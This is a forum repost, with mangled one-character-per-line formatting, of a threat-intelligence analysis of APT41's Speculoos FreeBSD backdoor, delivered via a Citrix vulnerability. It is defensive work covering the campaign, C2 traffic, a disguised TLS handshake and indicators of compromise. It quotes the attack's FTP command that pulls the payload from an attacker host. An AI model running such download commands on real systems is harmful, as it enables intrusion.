论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
云安全
[28351] 2020-06-14_APT41组织Speculoos木马后门程序分析
文档创建者:
s7ckTeam
浏览次数:
17
最后更新:
2025-01-19
云安全
17 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-06-14_APT41组织Speculoos木马后门程序分析
A
P
T
4
1
组
织
S
p
e
c
u
l
o
o
s
木
马
后
门
程
序
分
析
O
t
s
安
全
2
0
2
0
-
0
6
-
1
4
执
行
摘
要
执
行
摘
要
2
0
2
0
年
3
月
2
5
日
,
F
i
r
e
E
y
e
发
表
了
一
个
研
究
博
客
,
内
容
涉
及
由
间
谍
活
动
为
动
机
的
对
手
团
体
A
P
T
4
1
开
展
的
一
次
全
球
攻
击
活
动
。
据
认
为
,
此
攻
击
活
动
是
在
1
月
2
0
日
至
3
月
1
1
日
期
间
进
行
的
,
专
门
通
过
利
用
最
近
披
露
的
漏
洞
来
针
对
C
i
t
r
i
x
,
C
i
s
c
o
和
Z
o
h
o
网
络
设
备
。
基
于
U
n
i
t
4
2
可
用
的
W
i
l
d
F
i
r
e
和
A
u
t
o
F
o
c
u
s
数
据
,
我
们
能
够
获
得
针
对
C
i
t
r
i
x
设
备
的
有
效
负
载
样
本
,
这
些
样
本
是
编
译
为
可
在
F
r
e
e
B
S
D
上
运
行
的
可
执
行
文
件
。
我
们
还
使
用
此
数
据
来
确
定
北
美
,
南
美
和
欧
洲
等
世
界
各
地
的
医
疗
,
高
等
教
育
,
制
造
业
,
政
府
和
技
术
服
务
等
行
业
的
多
个
受
害
者
。
该
博
客
将
特
定
于
我
们
命
名
为
S
p
e
c
u
l
o
o
s
的
基
于
F
r
e
e
B
S
D
的
有
效
负
载
。
我
们
从
数
据
集
中
识
别
出
总
共
五
个
样
本
,
所
有
样
本
的
文
件
大
小
大
致
相
同
,
但
样
本
集
之
间
存
在
微
小
差
异
。
细
微
的
差
异
表
明
它
们
可
能
源
自
同
一
开
发
人
员
,
并
且
已
重
新
编
译
或
打
了
补
丁
。
如
F
i
r
e
E
y
e
所
述
,
S
p
e
c
u
l
o
o
s
是
通
过
利
用
C
V
E
-
2
0
1
9
-
1
9
7
8
1
来
交
付
的
,
C
V
E
-
2
0
1
9
-
1
9
7
8
1
是
一
个
影
响
C
i
t
r
i
x
A
p
p
l
i
c
a
t
i
o
n
D
e
l
i
v
e
r
y
C
o
n
t
r
o
l
l
e
r
,
C
i
t
r
i
x
G
a
t
e
w
a
y
和
C
i
t
r
i
x
S
D
-
W
A
N
W
A
N
O
P
设
备
的
漏
洞
,
允
许
攻
击
者
远
程
执
行
任
意
命
令
。
此
漏
洞
于
2
0
1
9
年
1
2
月
1
7
日
首
次
通
过
安
全
公
告
C
T
X
2
6
7
6
7
9
公
开
。
其
中
包
含
一
些
缓
解
建
议
。
到
2
0
2
0
年
1
月
2
4
日
,
已
发
布
受
影
响
设
备
的
永
久
补
丁
。
根
据
行
业
和
地
区
的
分
布
情
况
,
除
了
漏
洞
披
露
的
时
间
外
,
我
们
认
为
,
与
经
常
与
这
类
攻
击
者
相
关
联
的
针
对
性
强
的
攻
击
活
动
相
比
,
该
活
动
本
质
上
可
能
是
更
多
的
机
会
。
但
是
,
考
虑
到
利
用
此
漏
洞
并
结
合
专
门
设
计
用
于
在
相
关
的
F
r
e
e
B
S
D
操
作
系
统
上
执
行
的
后
门
,
表
明
对
手
绝
对
是
针
对
受
影
响
的
设
备
。
P
a
l
o
A
l
t
o
N
e
t
w
o
r
k
s
客
户
受
到
保
护
免
受
这
种
威
胁
。
我
们
的
带
有
W
i
l
d
f
i
r
e
的
威
胁
预
防
平
台
将
这
种
恶
意
软
件
识
别
为
恶
意
软
件
,
同
时
针
对
已
识
别
出
的
恶
意
和
/
或
受
感
染
域
更
新
P
A
N
-
D
B
U
R
L
过
滤
解
决
方
案
中
的
“
恶
意
软
件
”
类
别
。
A
u
t
o
F
o
c
u
s
客
户
可
以
使
用
S
p
e
c
u
l
o
o
s
标
签
继
续
跟
踪
S
p
e
c
u
l
o
o
s
活
动
。
攻
击
细
节
攻
击
细
节
在
此
攻
击
活
动
中
,
攻
击
者
利
用
C
V
E
-
2
0
1
9
-
1
9
7
8
1
指
示
受
害
设
备
使
用
命
令
/
u
s
r
/
b
i
n
/
f
t
p
-
o
/
t
m
p
/
b
s
d
f
t
p
:
/
/
t
e
s
t
:
[
r
e
d
a
c
t
e
d
]
@
6
6
.
4
2
通
过
F
T
P
检
索
S
p
e
c
u
l
o
o
s
。
.
9
8
[
。
]
2
2
0
/
<
f
i
l
e
n
a
m
e
>
由
F
i
r
e
E
y
e
报
告
。
我
们
的
数
据
与
该
活
动
一
致
,
第
一
波
始
于
2
0
2
0
年
1
月
3
1
日
U
T
C
晚
上
到
2
0
2
0
年
2
月
1
日
U
T
C
,
使
用
文
件
名
b
s
d
。
这
波
浪
潮
影
响
了
美
国
的
多
个
高
等
教
育
机
构
,
美
国
的
医
疗
机
构
和
爱
尔
兰
的
咨
询
公
司
。
第
二
波
始
于
U
T
C
的
2
0
2
0
年
2
月
2
4
日
至
U
T
C
午
夜
之
后
的
2
0
2
0
年
2
月
2
4
日
,
这
次
使
用
文
件
名
u
n
。
这
波
热
潮
影
响
了
哥
伦
比
亚
的
一
个
高
等
教
育
机
构
,
奥
地
利
的
一
个
制
造
组
织
,
美
国
第
一
波
浪
潮
中
针
对
的
一
个
高
等
教
育
机
构
以
及
美
国
的
州
政
府
。
尽
管
数
据
部
门
4
2
可
以
访
问
的
数
据
并
不
详
尽
,
但
检
查
我
们
确
实
有
数
据
的
受
害
者
的
扩
散
似
乎
表
明
,
这
次
攻
击
活
动
可
能
更
多
是
A
P
T
4
1
的
机
会
主
义
推
动
,
目
的
是
在
数
量
最
少
的
组
织
中
立
足
努
力
扩
展
其
攻
击
基
础
架
构
。
专
门
在
F
r
e
e
B
S
D
上
运
行
的
工
具
的
部
署
是
相
当
新
颖
的
。
针
对
基
于
B
S
D
的
系
统
的
恶
意
软
件
相
对
较
少
,
考
虑
到
结
合
使
用
此
工
具
和
影
响
特
定
C
i
t
r
i
x
网
络
设
备
的
漏
洞
,
S
p
e
c
u
l
o
o
s
很
可
能
是
A
P
T
4
1
专
为
此
攻
击
活
动
而
设
计
的
。
二
元
分
析
二
元
分
析
S
p
e
c
u
l
o
o
s
后
门
是
使
用
G
C
C
4
.
2
.
1
编
译
的
E
L
F
可
执
行
文
件
,
可
在
F
r
e
e
B
S
D
系
统
上
运
行
。
该
有
效
负
载
本
来
就
似
乎
无
法
保
持
持
久
性
,
因
此
很
可
能
需
要
对
手
使
用
单
独
的
组
件
或
其
他
步
骤
来
保
持
其
立
足
点
。
执
行
后
,
有
效
负
载
将
进
入
一
个
循
环
,
该
循
环
调
用
一
个
函
数
,
以
通
过
T
C
P
/
4
4
3
与
以
下
命
令
和
控
制
(
C
2
)
域
进
行
通
信
:
a
l
i
b
a
b
a
.
z
z
u
x
[
。
]
c
o
m
(
解
析
为
1
1
9
.
2
8
.
1
3
9
[
。
]
1
2
0
)
如
果
它
无
法
与
上
述
域
通
信
,
则
S
p
e
c
u
l
o
o
s
也
会
尝
试
通
过
T
C
P
/
4
4
3
使
用
1
1
9
.
2
8
.
1
3
9
[
。
]
2
0
上
的
备
份
C
2
。
如
果
它
能
够
连
接
到
任
一
C
2
服
务
器
,
它
将
使
用
二
进
制
文
件
中
的
硬
编
码
缓
冲
区
与
服
务
器
进
行
T
L
S
握
手
,
该
缓
冲
区
用
作
握
手
中
的
第
一
个
数
据
包
。
在
将
硬
编
码
的
缓
冲
区
发
送
到
C
2
服
务
器
之
前
,
S
p
e
c
u
l
o
o
s
会
使
用
域
时
间
字
符
串
迭
代
生
成
的
2
8
个
伪
随
机
字
节
,
将
偏
移
量
1
1
修
改
为
当
前
时
间
,
并
将
偏
移
量
1
5
修
改
为
1
5
,
将
当
前
时
间
相
加
,
然
后
在
每
个
字
节
上
使
用
X
O
R
乘
以
7
乘
以
该
字
节
的
字
节
数
。
偏
移
量
为
键
。
图
1
显
示
了
S
p
e
c
u
l
o
o
s
修
改
并
将
其
发
送
到
C
2
服
务
器
之
前
的
硬
编
码
缓
冲
区
。
1
6
0
3
0
1
0
0
B
5
0
1
0
0
0
0
B
1
0
3
0
1
0
0
0
0
0
0
0
0
0
0
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
0
0
0
0
0
0
0
0
0
0
6
A
C
E
1
4
2
7
3
F
2
4
9
2
A
B
0
A
A
3
F
7
.
.
.
.
.
j
.
.
'
?
$
.
.
.
.
.
图
1
.
用
作
发
送
到
C
2
服
务
器
的
T
L
S
客
户
端
H
e
l
l
o
数
据
包
的
硬
编
码
缓
冲
区
图
1
表
示
这
是
T
L
S
1
.
0
的
握
手
数
据
包
,
特
别
是
客
户
端
H
e
l
l
o
。
此
C
l
i
e
n
t
H
e
l
l
o
数
据
包
最
有
趣
的
部
分
是
,
它
请
求
l
o
g
i
n
.
l
i
v
e
[
。
]
c
o
m
作
为
服
务
器
名
称
指
示
(
S
N
I
)
,
这
表
明
作
者
可
以
尝
试
使
握
手
看
起
来
无
害
,
如
图
1
所
示
。
图
2
.
T
L
S
握
手
中
的
客
户
端
H
e
l
l
o
数
据
包
使
用
l
o
g
i
n
.
l
i
v
e
.
c
o
m
作
为
服
务
器
名
称
指
示
0
0
0
0
0
0
0
0
0
0
6
A
C
E
1
4
2
7
3
F
2
4
9
2
A
B
0
A
A
3
F
7
.
.
.
.
.
j
.
.
'
?
$
.
.
.
.
.
D
B
2
1
1
C
D
6
7
F
F
D
E
3
A
3
5
0
0
0
0
0
0
0
0
0
4
8
C
0
0
A
.
.
.
.
.
.
.
.
.
.
.
.
.
H
.
.
C
0
1
4
0
0
8
8
0
0
8
7
0
0
3
9
0
0
3
8
C
0
0
F
C
0
0
5
0
0
8
4
.
.
.
.
.
.
.
9
.
8
.
.
.
.
.
.
0
0
3
5
C
0
0
7
C
0
0
9
C
0
1
1
C
0
1
3
0
0
4
5
0
0
4
4
0
0
6
6
.
5
.
.
.
.
.
.
.
.
.
E
.
D
.
f
0
0
3
3
0
0
3
2
C
0
0
C
C
0
0
E
C
0
0
2
C
0
0
4
0
0
9
6
0
0
4
1
.
3
.
2
.
.
.
.
.
.
.
.
.
.
.
A
0
0
0
4
0
0
0
5
0
0
2
F
C
0
0
8
C
0
1
2
0
0
1
6
0
0
1
3
C
0
0
D
.
.
.
.
.
/
.
.
.
.
.
.
.
.
.
.
C
0
0
3
F
E
F
F
0
0
0
A
0
2
0
1
0
0
0
0
3
F
0
0
0
0
0
0
1
3
0
0
.
.
.
.
.
.
.
.
.
.
?
.
.
.
.
.
1
1
0
0
0
0
0
E
6
C
6
F
6
7
6
9
6
E
2
E
6
C
6
9
7
6
6
5
2
E
6
3
.
.
.
.
l
o
g
i
n
.
l
i
v
e
.
c
6
F
6
D
F
F
0
1
0
0
0
1
0
0
0
0
0
A
0
0
0
8
0
0
0
6
0
0
1
7
0
0
o
m
.
.
.
.
.
.
.
.
.
.
.
.
.
.
1
8
0
0
1
9
0
0
0
B
0
0
0
2
0
1
0
0
0
0
2
3
0
0
0
0
3
3
7
4
0
0
.
.
.
.
.
.
.
.
.
.
#
.
.
3
t
.
0
0
0
0
0
5
0
0
0
5
0
1
0
0
0
0
0
0
0
0
.
.
.
.
.
.
.
.
.
.
成
功
连
接
到
C
2
并
完
成
T
L
S
握
手
后
,
S
p
e
c
u
l
o
o
s
将
执
行
初
始
系
统
枚
举
以
对
受
害
系
统
进
行
指
纹
识
别
,
然
后
将
数
据
发
送
回
C
2
服
务
器
。
用
于
存
储
信
息
的
缓
冲
区
将
为
1
0
4
8
字
节
,
其
结
构
如
下
表
1
所
示
。
表
1
.
用
于
将
收
集
的
系
统
信
息
传
输
到
C
2
的
结
构
数
据
是
通
过
T
L
S
通
道
发
送
的
,
并
且
S
p
e
c
u
l
o
o
s
希
望
响
应
两
个
字
节
的
数
据
。
成
功
响
应
后
,
它
将
向
C
2
发
送
一
个
字
节
(
0
x
a
)
,
并
进
入
循
环
以
开
始
接
收
命
令
。
然
后
,
表
2
中
的
命
令
可
供
对
手
使
用
,
以
在
受
害
系
统
上
执
行
。
S
p
e
c
u
l
o
o
s
可
用
的
命
令
表
明
此
工
具
是
功
能
齐
全
的
后
门
,
可
让
攻
击
者
完
全
控
制
受
害
者
系
统
。
表
2
.
S
p
e
c
u
l
o
o
s
的
命
令
处
理
程
序
中
的
命
令
我
们
分
析
的
两
个
S
p
e
c
u
l
o
o
s
样
本
在
功
能
上
相
同
,
两
者
之
间
只
有
八
个
字
节
不
同
。
这
八
个
字
节
的
更
改
是
由
于
作
者
在
收
集
系
统
信
息
时
用
主
机
名
命
令
替
换
了
u
n
a
m
e
-
s
命
令
而
导
致
的
。
目
前
尚
不
清
楚
为
什
么
命
令
可
能
会
被
更
改
,
因
为
它
们
返
回
不
同
的
结
果
。
u
n
a
m
e
-
s
将
返
回
内
核
信
息
,
在
F
r
e
e
B
S
D
系
统
上
将
是
字
符
串
F
r
e
e
B
S
D
,
而
主
机
名
将
返
回
打
印
主
机
系
统
的
名
称
。
图
2
显
示
了
我
们
分
析
的
两
个
S
p
e
c
u
l
o
o
s
样
本
之
间
的
二
进
制
比
较
,
显
示
了
八
个
字
节
的
差
异
。
图
3
.
两
个
S
p
e
c
u
l
o
o
s
示
例
之
间
的
二
进
制
比
较
,
显
示
了
用
于
收
集
系
统
主
机
名
的
不
同
命
令
影
响
评
估
影
响
评
估
允
许
未
经
授
权
的
用
户
远
程
执
行
代
码
的
漏
洞
几
乎
始
终
是
潜
在
的
高
影
响
安
全
性
问
题
,
尤
其
是
当
它
们
影
响
面
向
公
众
的
系
统
时
,
尤
其
如
此
。
在
这
种
情
况
下
,
C
V
E
-
2
0
1
9
-
1
9
7
8
1
影
响
了
多
个
可
能
面
向
公
众
的
设
备
,
并
有
一
个
积
极
进
取
的
对
手
积
极
利
用
此
漏
洞
来
安
装
自
定
义
后
门
程
序
。
考
虑
到
受
影
响
的
设
备
的
类
型
,
任
何
可
能
受
影
响
的
组
织
都
必
须
立
即
采
取
缓
解
措
施
,
这
一
点
至
关
重
要
。
因
为
所
有
或
大
量
的
网
络
活
动
都
必
须
遍
历
这
些
受
到
破
坏
的
网
络
设
备
,
所
以
攻
击
者
可
以
更
轻
松
地
监
视
或
修
改
整
个
组
织
的
网
络
活
动
,
而
不
必
将
它
们
降
级
为
单
个
或
少
数
设
备
。
此
外
,
由
于
默
认
情
况
下
这
些
设
备
可
以
访
问
大
量
组
织
系
统
,
因
此
横
向
移
动
所
面
临
的
挑
战
将
大
大
减
少
。
攻
击
者
可
能
试
图
直
接
穿
越
必
须
穿
越
受
感
染
设
备
的
其
他
主
机
,
甚
至
可
能
修
改
网
络
流
量
以
执
行
其
他
恶
意
行
为
,
例
如
注
入
/
传
递
恶
意
代
码
,
执
行
中
间
人
攻
击
,
或
将
用
户
重
定
向
到
对
手
拥
有
的
登
录
页
面
以
收
集
凭
据
。
最
后
,
由
于
设
备
的
性
质
,
检
测
这
些
攻
击
可
能
更
具
挑
战
性
,
因
为
通
常
它
们
是
黑
匣
子
型
解
决
方
案
,
除
非
出
现
问
题
,
否
则
它
们
通
常
不
与
异
常
活
动
进
行
交
互
或
检
查
异
常
活
动
。
妥
协
指
标
妥
协
指
标
分
析
窥
镜
S
H
A
2
5
6
9
9
c
5
d
b
e
b
5
4
5
a
f
3
e
f
1
f
0
f
9
6
4
3
4
4
9
0
1
5
9
8
8
c
4
e
0
2
b
f
8
a
7
1
6
4
b
5
d
6
c
8
6
f
6
7
e
6
d
c
2
d
2
8
6
9
4
3
f
b
b
1
9
4
3
1
7
d
3
4
4
c
a
9
9
1
1
b
7
a
b
b
1
1
b
6
8
4
d
3
d
c
a
4
c
2
9
a
d
c
b
c
f
f
3
9
2
9
1
8
2
2
9
0
2
1
6
7
附
加
窥
镜
S
H
A
2
5
6
4
9
3
5
7
4
e
9
b
1
c
c
6
1
8
b
1
a
9
6
7
b
a
9
d
a
b
e
c
4
7
4
b
b
2
3
9
7
7
7
a
3
d
8
1
c
1
1
e
4
9
e
7
b
b
9
c
7
1
c
0
c
4
e
8
5
2
9
7
0
9
7
f
6
d
b
e
8
a
5
2
9
7
4
a
4
3
0
1
6
4
2
5
d
4
a
d
a
a
6
1
f
3
b
d
b
5
f
c
d
d
1
8
6
b
f
d
a
2
2
5
5
d
5
6
b
3
d
c
2
a
8
8
c
c
3
4
1
8
b
4
8
8
d
2
1
2
b
3
6
1
7
2
b
0
8
9
b
0
d
3
2
9
f
a
6
e
4
a
0
9
4
5
8
3
b
7
5
7
f
d
d
3
c
5
3
9
8
e
f
e
1
指
标
1
1
9
.
2
8
.
1
3
9
[
。
]
2
0
a
l
i
b
a
b
a
.
z
z
u
x
[
。
]
c
o
m
1
1
9
.
2
8
.
1
3
9
[
。
]
1
2
0
6
6
.
4
2
.
9
8
[
。
]
2
2
0
e
x
c
h
a
n
g
e
.
l
o
n
g
m
u
s
i
c
[
。
]
c
o
m
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
云安全